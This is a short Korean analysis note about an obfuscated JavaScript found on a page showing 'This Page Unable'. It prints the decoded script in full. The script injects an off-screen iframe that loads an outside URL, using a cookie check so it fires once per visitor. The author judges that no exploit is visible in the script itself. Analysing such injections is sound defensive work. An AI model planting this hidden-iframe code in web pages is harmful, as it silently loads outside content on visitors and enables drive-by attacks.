js 난독화

This Page Unable을 출력해준다. 누가 보면 정말 페이지 사용 못하는 줄 알겠다.

.

function gxr09() {  var static='ajax';  var controller='index.php';  var gxr = document.createElement('iframe');  gxr.src = 'http://flintys.nl/count.php';  gxr.style.position = 'absolute';  gxr.style.color = '84119';  gxr.style.height = '84119px';  gxr.style.width = '84119px';  gxr.style.left = '100084119';  gxr.style.top = '100084119';  if (!document.getElementById('gxr')) {  document.write('<p id=\'gxr\' class=\'gxr09\' ></p>');  document.getElementById('gxr').appendChild(gxr);  } } function SetCookie(cookieName,cookieValue,nDays,path) {  var today = new Date();  var expire = new Date();  if (nDays==null || nDays==0) nDays=1;  expire.setTime(today.getTime() + 3600000*24*nDays);  document.cookie = cookieName+"="+escape(cookieValue)  + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) {  var start = document.cookie.indexOf( name + "=" );  var len = start + name.length + 1;  if ( ( !start ) &&  ( name != document.cookie.substring( 0, name.length ) ) )  {  return null;  }  if ( start == -1 ) return null;  var end = document.cookie.indexOf( ";", len );  if ( end == -1 ) end = document.cookie.length;  return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); gxr09(); } }

복호화하면 위와 같은 스크립트가 나오는데, iframe안에 src속성 값을 주어 로드시킨다.

exploit의 요지는 없어보인다.